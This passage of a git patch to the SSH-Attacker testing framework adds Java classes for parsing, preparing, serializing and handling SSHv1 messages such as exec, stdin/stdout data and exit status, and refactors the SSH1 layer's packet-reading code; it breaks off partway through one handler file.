17:29:59 +0100 Subject: [PATCH 140/176] Implementing new SSHv1 Messages --- .../core/layer/impl/SSH1Layer.java | 177 ++++++------------ .../handler/DebugMessageSSHV1Handler.java | 31 +++ .../ssh1/handler/EofMessageSSHV1Handler.java | 35 ++++ .../handler/ExecCmdMessageSSHV1Handler.java | 36 ++++ .../handler/ExecShellMessageSSHV1Handler.java | 28 +++ .../ExitConfirmationMessageSSHV1Handler.java | 34 ++++ .../ExitStatusMessageSSHV1Handler.java | 33 ++++ .../handler/IgnoreMessageSSHV1Handler.java | 32 ++++ .../StderrDataMessageSSHV1Handler.java | 38 ++++ .../handler/StdinDataMessageSSHV1Handler.java | 37 ++++ .../StdoutDataMessageSSHV1Handler.java | 37 ++++ .../ssh1/message/DebugMessageSSH1.java | 66 +++++++ .../protocol/ssh1/message/EofMessageSSH1.java | 52 +++++ .../ssh1/message/ExecCmdMessageSSH1.java | 70 +++++++ .../ssh1/message/ExecShellMessageSSH1.java | 52 +++++ .../message/ExitConfirmationMessageSSH1.java | 52 +++++ .../ssh1/message/ExitStatusMessageSSH1.java | 70 +++++++ .../ssh1/message/IgnoreMessageSSH1.java | 67 +++++++ .../ssh1/message/StderrDataMessageSSH1.java | 70 +++++++ .../ssh1/message/StdinDataMessageSSH1.java | 70 +++++++ .../ssh1/message/StdoutDataMessageSSH1.java | 70 +++++++ .../ssh1/parser/DebugMessageSSHv1Parser.java | 40 ++++ .../ssh1/parser/EofMessageSSHV1Parser.java | 33 ++++ .../parser/ExecCmdMessageSSHv1Parser.java | 41 ++++ .../parser/ExecShellMessageSSHV1Parser.java | 33 ++++ .../ExitConfirmationMessageSSHV1Parser.java | 33 ++++ .../parser/ExitStatusMessageSSHV1Parser.java | 40 ++++ .../ssh1/parser/IgnoreMessageSSHV1Parser.java | 49 +++++ .../parser/StderrDataMessageSSHv1Parser.java | 41 ++++ .../parser/StdinDataMessageSSHv1Parser.java | 41 ++++ .../parser/StdoutDataMessageSSHv1Parser.java | 41 ++++ .../DebugMessageSSHV1Preparator.java | 38 ++++ .../preparator/EofMessageSSHV1Preparator.java | 30 +++ .../ExecCmdMessageSSHV1Preparator.java | 39 ++++ .../ExecShellMessageSSHV1Preparator.java | 29 +++ ...xitConfirmationMessageSSHV1Preparator.java | 30 +++ .../ExitStatusMessageSSHV1Preparator.java | 34 ++++ .../IgnoreMessageSSHV1Preparator.java | 38 ++++ .../StderrDataMessageSSHV1Preparator.java | 39 ++++ .../StdinDataMessageSSHV1Preparator.java | 39 ++++ .../StdoutDataMessageSSHV1Preparator.java | 39 ++++ .../DebugMessageSSHV1Serializier.java | 39 ++++ .../EofMessageSSHV1Serializier.java | 26 +++ .../ExecCmdMessageSSHV1Serializier.java | 40 ++++ .../ExecShellMessageSSHV1Serializier.java | 25 +++ ...itConfirmationMessageSSHV1Serializier.java | 26 +++ .../ExitStatusMessageSSHV1Serializier.java | 37 ++++ .../IgnoreMessageSSHV1Serializier.java | 39 ++++ .../StderrDataMessageSSHV1Serializier.java | 40 ++++ .../StdinDataMessageSSHV1Serializier.java | 40 ++++ .../StdoutDataMessageSSHV1Serializier.java | 40 ++++ 51 files changed, 2135 insertions(+), 121 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DebugMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/EofMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecCmdMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecShellMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitConfirmationMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitStatusMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/IgnoreMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StderrDataMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdinDataMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdoutDataMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DebugMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/EofMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecCmdMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecShellMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitConfirmationMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitStatusMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/IgnoreMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StderrDataMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdinDataMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdoutDataMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DebugMessageSSHv1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/EofMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecCmdMessageSSHv1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecShellMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitConfirmationMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitStatusMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/IgnoreMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StderrDataMessageSSHv1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdinDataMessageSSHv1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdoutDataMessageSSHv1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DebugMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/EofMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecCmdMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecShellMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitConfirmationMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitStatusMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/IgnoreMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StderrDataMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdinDataMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdoutDataMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DebugMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/EofMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecCmdMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecShellMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitConfirmationMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitStatusMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/IgnoreMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StderrDataMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdinDataMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdoutDataMessageSSHV1Serializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 1619b961f..ecef524d5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -199,7 +199,7 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { if (packet instanceof BlobPacket) { String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); if (rawText.startsWith("SSH-")) { - readVersionExchangeProtocolData((BlobPacket) packet); + readDataFromStream(new VersionExchangeMessageSSHV1(), (BlobPacket) packet); return; } else { final AsciiMessage message = new AsciiMessage(); @@ -217,7 +217,7 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { LOGGER.warn( "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); } - readASCIIData((BlobPacket) packet); + readDataFromStream(new AsciiMessage(), (BlobPacket) packet); return; } } @@ -230,58 +230,83 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { switch (id) { case SSH_MSG_DISCONNECT: - LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); - readDisconnectData((BinaryPacket) packet); + LOGGER.debug("[bro] Reading SSH_MSG_DISCONNECT Paket"); + readDataFromStream(new DisconnectMessageSSH1(), (BinaryPacket) packet); break; case SSH_CMSG_USER: - LOGGER.debug("[bro] returning SSH_CMSG_USER Hint"); - readUserData((BinaryPacket) packet); + LOGGER.debug("[bro] Reading SSH_CMSG_USER Paket"); + readDataFromStream(new UserMessageSSH1(), (BinaryPacket) packet); break; case SSH_SMSG_PUBLIC_KEY: - LOGGER.debug("[bro] returning SSH_SMSG_PUBLIC_KEY Hint"); - readPublicKeyData((BinaryPacket) packet); + LOGGER.debug("[bro] Reading SSH_SMSG_PUBLIC_KEY Paket"); + readDataFromStream(new ServerPublicKeyMessage(), (BinaryPacket) packet); break; case SSH_CMSG_SESSION_KEY: - LOGGER.debug("[bro] returning SSH_SMSG_PUBLIC_KEY Hint"); - readSessionKeyData((BinaryPacket) packet); + LOGGER.debug("[bro] Reading SSH_CMSG_SESSION_KEY Paket"); + readDataFromStream(new ClientSessionKeyMessage(), (BinaryPacket) packet); break; - // return new PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1.SSH_SMSG_PUBLIC_KEY); case SSH_MSG_IGNORE: - LOGGER.debug("[bro] returning SSH_MSG_IGNORE Hint"); + LOGGER.debug("[bro] Reading SSH_MSG_IGNORE Paket"); + readDataFromStream(new IgnoreMessageSSH1(), (BinaryPacket) packet); break; - // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_IGNORE); case SSH_MSG_DEBUG: - LOGGER.debug("[bro] returning SSH_MSG_DEBUG Hint"); + LOGGER.debug("[bro] Reading SSH_MSG_DEBUG Paket"); + readDataFromStream(new DebugMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_EOF: + LOGGER.debug("[bro] Reading SSH_CMSG_EOF Paket"); + readDataFromStream(new EofMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_EXEC_CMD: + LOGGER.debug("[bro] Reading SSH_CMSG_EXEC_CMD Paket"); + readDataFromStream(new ExecCmdMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_EXEC_SHELL: + LOGGER.debug("[bro] Reading SSH_CMSG_EXEC_SHELL Paket"); + readDataFromStream(new ExecShellMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_EXIT_CONFIRMATION: + LOGGER.debug("[bro] Reading SSH_CMSG_EXIT_CONFIRMATION Paket"); + readDataFromStream(new ExitConfirmationMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_STDIN_DATA: + LOGGER.debug("[bro] Reading SSH_CMSG_STDIN_DATA Paket"); + readDataFromStream(new StdinDataMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_SMSG_STDOUT_DATA: + LOGGER.debug("[bro] Reading SSH_SMSG_STDOUT_DATA Paket"); + readDataFromStream(new StdoutDataMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_SMSG_STDERR_DATA: + LOGGER.debug("[bro] Reading SSH_SMSG_STDERR_DATA Paket"); + readDataFromStream(new StderrDataMessageSSH1(), (BinaryPacket) packet); break; - // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DEBUG); case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_CONFIRMATION Hint"); + LOGGER.debug("[bro] Reading SSH_MSG_CHANNEL_OPEN_CONFIRMATION Paket"); + break; + case SSH_SMSG_EXITSTATUS: + LOGGER.debug("[bro] Reading SSH_SMSG_EXITSTATUS Paket"); + readDataFromStream(new ExitStatusMessageSSH1(), (BinaryPacket) packet); break; - /*return new PacketLayerHint( - ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_CONFIRMATION);*/ case SSH_MSG_CHANNEL_OPEN_FAILURE: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_FAILURE Hint"); + LOGGER.debug("[bro] Reading SSH_MSG_CHANNEL_OPEN_FAILURE Paket"); break; - // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_FAILURE); case SSH_MSG_CHANNEL_DATA: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_DATA Hint"); + LOGGER.debug("[bro] Reading SSH_MSG_CHANNEL_DATA Paket"); break; - // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_DATA); case SSH_MSG_CHANNEL_CLOSE: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); + LOGGER.debug("[bro] Reading SSH_MSG_CHANNEL_CLOSE Paket"); break; - // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_CLOSE); case SSH_CMSG_AUTH_TIS: - LOGGER.debug("[bro] returning SSH_CMSG_AUTH_TIS Hint"); - readSuccessMessage((BinaryPacket) packet); + LOGGER.debug("[bro] Reading SSH_CMSG_AUTH_TIS Paket"); break; case SSH_SMSG_SUCCESS: - LOGGER.debug("[bro] returning SSH_SMSG_SUCCESS Hint"); - readSuccessMessage((BinaryPacket) packet); + LOGGER.debug("[bro] Reading SSH_SMSG_SUCCESS Paket"); + readDataFromStream(new SuccessMessageSSH1(), (BinaryPacket) packet); break; case SSH_SMSG_FAILURE: - LOGGER.debug("[bro] returning SSH_SMSG_FAILURE Hint"); - readFailureMessage((BinaryPacket) packet); + LOGGER.debug("[bro] Reading SSH_SMSG_FAILURE Paket"); + readDataFromStream(new FailureMessageSSH1(), (BinaryPacket) packet); break; default: LOGGER.debug( @@ -293,24 +318,7 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { } } - private void readUnknownProtocolData() { - UnknownMessage message = new UnknownMessage(); - readDataContainer(message, context); - getLowerLayer().removeDrainedInputStream(); - } - - private void readSessionKeyData(AbstractPacket packet) { - ClientSessionKeyMessage message = new ClientSessionKeyMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readDisconnectData(AbstractPacket packet) { - DisconnectMessageSSH1 message = new DisconnectMessageSSH1(); + private void readDataFromStream(ProtocolMessage message, AbstractPacket packet) { HintedInputStream temp_stream; temp_stream = @@ -319,79 +327,6 @@ private void readDisconnectData(AbstractPacket packet) { readContainerFromStream(message, context, temp_stream); } - private void readUserData(AbstractPacket packet) { - UserMessageSSH1 message = new UserMessageSSH1(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readSuccessMessage(AbstractPacket packet) { - SuccessMessageSSH1 message = new SuccessMessageSSH1(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readFailureMessage(AbstractPacket packet) { - FailureMessageSSH1 message = new FailureMessageSSH1(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - } - - private void readPublicKeyData(AbstractPacket packet) { - ServerPublicKeyMessage message = new ServerPublicKeyMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - // readDataContainer(message, context); - } - - private void readASCIIData(AbstractPacket packet) { - AsciiMessage message = new AsciiMessage(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - // readDataContainer(message, context); - } - - private void readVersionExchangeProtocolData(AbstractPacket packet) { - VersionExchangeMessageSSHV1 message = new VersionExchangeMessageSSHV1(); - HintedInputStream temp_stream; - - temp_stream = - new HintedInputStreamAdapterStream( - new ByteArrayInputStream(packet.getPayload().getValue())); - readContainerFromStream(message, context, temp_stream); - - // readDataContainer(message, context); - } - - /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 - | totalHeaderLength[1]; - } - - private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 - | totalHeaderLength[1]; - }*/ @Override public void receiveMoreData() throws IOException { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DebugMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DebugMessageSSHV1Handler.java new file mode 100644 index 000000000..8458f22a2 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DebugMessageSSHV1Handler.java @@ -0,0 +1,31 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class DebugMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public DebugMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(DebugMessageSSH1 message) { + LOGGER.warn( + "Recieved a Ignore Message, Reason: {}", + message.getDebugMessage().getValue()); + sshContext.setDisconnectMessageReceived(true); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/EofMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/EofMessageSSHV1Handler.java new file mode 100644 index 000000000..9d3fa058c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/EofMessageSSHV1Handler.java @@ -0,0 +1,35 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class EofMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public EofMessageSSHV1Handler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(EofMessageSSH1 message) { + LOGGER.info("Recived a EOF Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecCmdMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecCmdMessageSSHV1Handler.java new file mode 100644 index 000000000..5aaf4031a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecCmdMessageSSHV1Handler.java @@ -0,0 +1,36 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecCmdMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExecCmdMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExecCmdMessageSSHV1Handler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(ExecCmdMessageSSH1 message) { + LOGGER.warn( + "Recieved a Command : {}", + message.getCommand().getValue()); + //sshContext.setDisconnectMessageReceived(true); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecShellMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecShellMessageSSHV1Handler.java new file mode 100644 index 000000000..410b970b0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecShellMessageSSHV1Handler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecShellMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExecShellMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExecShellMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(ExecShellMessageSSH1 message) { + LOGGER.info("Recived a Exec Shell Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitConfirmationMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitConfirmationMessageSSHV1Handler.java new file mode 100644 index 000000000..a88aae1e9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitConfirmationMessageSSHV1Handler.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExitConfirmationMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExitConfirmationMessageSSHV1Handler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(ExitConfirmationMessageSSH1 message) { + LOGGER.info("Recived a EOF Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitStatusMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitStatusMessageSSHV1Handler.java new file mode 100644 index 000000000..41b2229f0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitStatusMessageSSHV1Handler.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExitStatusMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExitStatusMessageSSHV1Handler(SshContext context) { + super(context); + } + + + + @Override + public void adjustContext(ExitStatusMessageSSH1 message) { + LOGGER.warn( + "Recieved Exit Status {}", + message.getExitStatus().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/IgnoreMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/IgnoreMessageSSHV1Handler.java new file mode 100644 index 000000000..cb429f1a9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/IgnoreMessageSSHV1Handler.java @@ -0,0 +1,32 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.IgnoreMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class IgnoreMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public IgnoreMessageSSHV1Handler(SshContext context) { + super(context); + } + + + @Override + public void adjustContext(IgnoreMessageSSH1 message) { + 